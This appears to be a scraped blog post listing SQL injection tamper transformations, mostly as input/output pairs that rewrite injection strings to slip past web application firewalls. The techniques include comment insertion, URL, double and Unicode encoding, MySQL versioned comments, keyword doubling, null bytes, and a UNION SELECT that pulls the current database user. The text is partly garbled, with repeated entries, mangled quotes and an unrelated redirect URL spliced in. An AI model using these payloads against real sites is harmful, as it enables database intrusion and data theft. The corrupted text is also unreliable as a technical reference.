Example: ( "1 AND '1'='1" ) '1  AND  %EF%BC%871%EF%BC%87=%EF%BC%871'

Example:*   Input:  SELECT  *  FROM  users  WHERE  id=1*    Output :  SELECT  *  FROM  users  WHERE  id  LIKE  1

Example: ( '1 AND 9227=9227' )  '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

Example: ( '1 AND A > B' )  '1 AND GREATEST(A,B+1)=A'  Tested against: * MySQL 4, 5.0  and  5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

Example:*   Input: 1  AND  9227=9227*    Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

http://medousa-rho.com/zcredirect?visitid=dc21fe54-a853-11ec-bb63-0a445ac5cf13&type=js&browserWidth=1590&browserHeight=919&iframeDetected=false

Example: tamper( "1 AND '1'='1" ) '1  AND  %00%271%00%27=%00%271'

Example:
( "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa" )  "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

Example:* Input: 1  AND  9227=9227 *  Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Example: ( '1 AND 1=1' )  '1 AND 1=1%00'

Example: ( 'IFNULL(1, 2)' )  'IF(ISNULL(1),2,1)'

Example: ( '1 AND 9227=9227' )  '1%23%0AAND%23%0A9227=9227'  Requirement: * MSSQL * MySQL

Example: ( '1 AND 2>1--' )  '1 /*!30874AND 2>1*/--'

Example:* Input:  SELECT  id  FROM  users*  Output :  SELECT %0Bid%0BFROM%A0users

Example: ( '1 AND A > B--' )  '1 AND A NOT BETWEEN 0 AND B--'

Example: ( '1 AND 9227=9227' )  '1--%0AAND--%0A9227=9227'

Example: ( '1 UNION SELECT foobar' )  '1 UNION SELECT foobar'

Example: ( 'SELECT id FROM users' )  'SELECT+id+FROM+users'  Tested against:  all

Example: ( 'SELECT id FROM users where id = 1' )  'SELECT%09id FROM users where id LIKE 1'

Example: ( '1 UNION SELECT 2--' )  '1 UNIOUNIONN SELESELECTCT 2--'  Tested against:  all

Example: ( 'SELECT id FROM users' )  'SELECT%0Did%0DFROM%0Ausers'

Example: ( '1 AND 9227=9227-- ' )  '1 AND 9227=9227-- sp_password'  Requirement: * MSSQL

Example:* Input:  SELECT  FIELD  FROM %20TABLE*  Output : %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

Example:*   Input:  SELECT  FIELD  FROM %20TABLE*    Output : %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Example:* Input: 1′  AND  1=1*  Output : 1%bf%27  AND  1=1–%20

Example:‘ INSERT ’ becomes ‘ IN //S//ERT’

Example:* Input:  SELECT  FIELD%20FROM  TABLE*  Output : %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Example: ( '1 AND 1=1' )  "1 AND 1=1 and '0having'='0having'"

Example:* Input: 1  UNION  ALL  SELECT  NULL ,  NULL , CONCAT( CHAR (58,122,114,115,58),IFNULL( CAST ( CURRENT_USER ()  AS  CHAR ), CHAR (32)), CHAR (58,115,114,121,58))#*  Output : 1/*! UNION **! ALL **! SELECT **! NULL */,/*! NULL */,/*!CONCAT*/(/*! CHAR */(58,122,114,115,58),/*!IFNULL*/( CAST (/*! CURRENT_USER */()/*! AS **! CHAR */),/*! CHAR */(32)),/*! CHAR */(58,115,114,121,58))#

Example:* Input:  SELECT  id  FROM  users*  Output :  SELECT //id// FROM /**/users

Example:* Input: value’  UNION  ALL  SELECT  CONCAT( CHAR (58,107,112,113,58),IFNULL( CAST ( CURRENT_USER ()  AS  CHAR ), CHAR (32)), CHAR (58,97,110,121,58)),  NULL ,  NULL #  AND  ‘QDWa’= 'QDWa* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’=' QDWa

原文链接：https://blog.csdn.net/wswokao/article/details/80884382